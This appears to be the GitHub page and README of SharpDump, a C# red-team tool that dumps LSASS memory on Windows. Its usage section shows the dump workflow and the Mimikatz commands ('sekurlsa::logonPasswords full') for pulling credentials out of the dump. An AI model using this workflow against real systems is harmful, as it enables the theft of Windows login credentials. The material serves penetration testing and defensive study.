SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.
Switch branches/tags
Nothing to show
Clone or download
HarmJ0y Merge pull request #2 from ClementNotin/patch-1
Create .gitignore with common VS exclusions
Latest commit 467496b Aug 20, 2018
Permalink
Failed to load latest commit information.
SharpDump initial commit Jul 24, 2018
.gitignore Create .gitignore with common VS exclusions Jul 25, 2018
LICENSE initial commit Jul 24, 2018
README.md update README.md Jul 24, 2018
SharpDump.sln initial commit Jul 24, 2018

README.md

SharpDump


SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. The MiniDumpWriteDump Win32 API call is used to create a minidump for the process ID specified (LSASS by default) to C:\Windows\Temp\debug.out, GZipStream is used to compress the dump to C:\Windows\Temp\debug.bin (.gz format), and the original minidump file is deleted.

@harmj0y is the primary author of this port.

SharpDump is licensed under the BSD 3-Clause license.

Usage

Dump LSASS:

C:\Temp>SharpDump.exe

[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out

[+] Dumping completed. Rename file to "debug808.gz" to decompress.

[*] Operating System : Windows 10 Enterprise N
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

Dump a specific process ID:

C:\Temp>SharpDump.exe 8700

[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out

[+] Dumping completed. Rename file to "debug8700.gz" to decompress.

Compile Instructions

We are not planning on releasing binaries for SharpDump, so you will have to compile yourself :)

SharpDump has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.